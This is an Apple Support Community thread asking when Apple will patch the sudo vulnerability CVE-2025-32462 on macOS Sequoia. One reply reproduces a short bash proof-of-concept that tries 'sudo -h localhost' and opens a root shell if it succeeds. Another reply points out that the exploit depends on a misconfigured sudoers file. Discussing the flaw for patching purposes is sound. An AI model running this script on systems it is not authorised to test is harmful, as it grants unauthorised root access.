macOS 15.6 sudo vulnerability CVE-2025-32462

Trying to find out when Apple will release a security update to Sequoia for this sudo vulnerability.


Sudo is subject to this vulnerability from version 1.8.8 thru 1.9.17 - Sequoia appears to have sudo version 1.9.13 included.

Posted on Aug 12, 2025 3:03 AM

Reply
4 replies

Aug 12, 2025 9:17 AM in response to MrHoffman

MrHoffman wrote:

Here is what is purportedly the proof of concept (POC) for this vulnerability.

https://github.com/cyberpoul/CVE-2025-32462-POC

There is a crucial part of the exploit that you're missing here.


In order to be vulnerable, the sudo configuration must be misconfigured to begin with.


They helpfully provide an example of a misconfiguration, but visudo refused to accept it.


The "security" circus continues...

Aug 12, 2025 8:03 AM in response to RelfMA

Here is what is purportedly the proof of concept (POC) for this vulnerability.


https://github.com/cyberpoul/CVE-2025-32462-POC


Try it:


#!/bin/bash
# CVE-2025-32462 – sudo -h privilege escalation PoC
# by opscur

echo "[+] Testing for CVE-2025-32462 bypass via 'sudo -h'..."

CMD=${1:-id}

if sudo -h localhost $CMD 2>/dev/null | grep -q "uid=0(root)"; then
    echo "[!] Success: Root access granted!"
    sudo -h localhost /bin/bash -p
else
    echo "[-] Target not vulnerable or sudoers configuration not exploitable."
fi

This thread has been closed by the system or the community team. You may vote for any posts you find helpful, or search the Community for additional answers.

macOS 15.6 sudo vulnerability CVE-2025-32462

Welcome to Apple Support Community
A forum where Apple customers help each other with their products. Get started with your Apple Account.